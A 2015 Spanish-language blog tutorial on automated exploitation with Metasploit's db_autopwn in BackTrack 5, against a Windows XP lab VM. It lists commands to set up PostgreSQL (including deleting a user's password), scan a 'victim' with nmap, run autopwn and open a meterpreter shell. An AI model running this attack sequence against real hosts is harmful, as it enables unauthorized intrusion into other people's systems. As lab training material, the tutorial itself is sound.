Post on 03-Jul-2015
description
ESTE TUTORIAL ES PARA FINES EDUCATIVIOS
Como hacer un autopwn en backtrack 5 con nmap, metasploit y postgresql
Aquí les dejo el post original de la info para que lo verifiquen: Metasploit db_autopwn using PostgreSQL
El backtrack 5 no trae instalado el postgresql por eso deve escribir en una terminal:
apt-get install postgresql libpq-dev
el libpq trabaja con las peticiones y respuestas entre cliente y servidor en el postgresql.
Al finalizar la instalación conectamos con el postgresql y cambiamos el password
sudo su postgres -c psql
Aquí pones el password nuevo.
ALTER USER postgres WITH PASSWORD 'password' ;
después \q
sudo passwd -d postgres
sudo su postgres -c passwd con este se cambia el password
Esto es para conectarse del ruby al postgresql. gem install pg
Ahora llamamos a metasploit
msfconsole
db_driver postgresql
y para conectar con la base de datos
db_connect postgres:”password”@127.0.0.1/metasploitdb
El password que habías puesto anterior mente. Aquí va el nombre que le quiera asignar a la base de datos.
Ahora utilizamos nmap para ver las vulnerabilidades de la víctima.
nmap -sV -O 10.0.0.71 <-------- el numero ip de la víctima que para el tutorial es una maquina virtual de xp sp 1.
Nmap escaneo los puertos e identifico el sistema operativo de la víctima.Ahora procedemos con el ataque.
db_hosts
db_autopwn -t -p -e
AL terminar el autopwn muestra las posibles sesiones.
Para entrar a una de ellas sessions -i 1 el numero es la sesión que fue elegida.
Aquí se puede ver como entra al shell de windows desde meterpreter.
ESTE TUTORIAL ES PARA FINES EDUCATIVIOS